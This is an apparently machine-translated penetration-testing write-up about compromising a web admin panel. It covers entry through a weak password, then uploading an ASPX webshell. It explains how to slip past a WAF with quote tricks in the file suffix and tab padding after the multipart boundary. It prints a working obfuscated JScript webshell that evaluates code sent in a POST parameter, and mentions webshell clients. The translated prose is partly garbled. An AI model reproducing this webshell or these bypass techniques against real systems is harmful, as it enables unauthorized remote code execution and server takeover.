0x01 background
Weak password enters a background, there is any file upload, there is waf
Test that the aa suffix was successfully uploaded. You can see the file path by viewing the dispatch
Direct upload aspx was blocked
0x02 bypass suffix name detection
First simply try to capitalize and block, ashx, asmx, asp, cer are blocked
Directly upload cshtml, please refer to https://www.cnblogs.com/cwkiller/p/12087890.html
Visit jump 404, it is estimated that it is not resolved
Try to bypass the waf suffix detection directly. After a simple test, you can bypass it by adding a single quote after the double quote.
0x03 Bypass content detection
Directly on the ice scorpion, found that the detection content was intercepted by waf
Copying the picture content puts the horse in the middle, and still can't get around. Some waf may be bigger and the bag will be released directly. If it doesn't work, I copied the big picture content and it is still blocked.
This station did not find waf during the previous test injection process. Try to directly send a sentence post (non-upload format) and it will not be intercepted.
Guess waf must determine that this is an upload package by Content-Type: multipart / form-data, and then check the content
And how does waf parse the post package where the uploaded content is based on
Content-Type: multipart/form-data; boundary=---------------------------7e43d3910182
Content-Type boundary value --------------------------- 7e43d3910182
Then the idea is coming, we add a number of Tab keys after ------------------------- 7e43d3910182 The server both parses the uploaded content normally and Waf may use
--------------------------- 7e43d3910182TabTab to find the uploaded content, but it cannot be found and is bypassed. Just have to test it
Bingo successfully bypassed content detection
0x04 Strange 404
Upload successfully, visit the horse first
This is also the case, where is the problem, you ca n’t even connect directly to the horse, and smoking a cigarette remembers that a jsp station was successfully uploaded before it is always 404 https://www.cnblogs.com/cwkiller/p/ 11788009.html
It may be that the content output of the horse will not be 404, and directly go to Malaysia, the system permission is successfully connected
Verify whether it is the horse that has the content output to not 404, upload and print the aspx of the current time
<%@Page Language="C#"%>
<%
Response.Write(DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss"));
System.IO.File.Delete(Request.PhysicalPath);
%>
Confirmed the guess, Ant Sword added a sentence to output hello, world sentence
<%@ Page Language="Jscript" Debug=true%>
<%
Response.Write("hello,world");
var hw=Request.Form("mr6");
var du='iNUZuDe';
var zu=du.replace("iNUZuD","unsaf");
function RIEo(BWrg)
{eval(BWrg,zu);}
RIEo(hw);
%>
Bring a cookie (the files in this directory require login to access), the connection is successful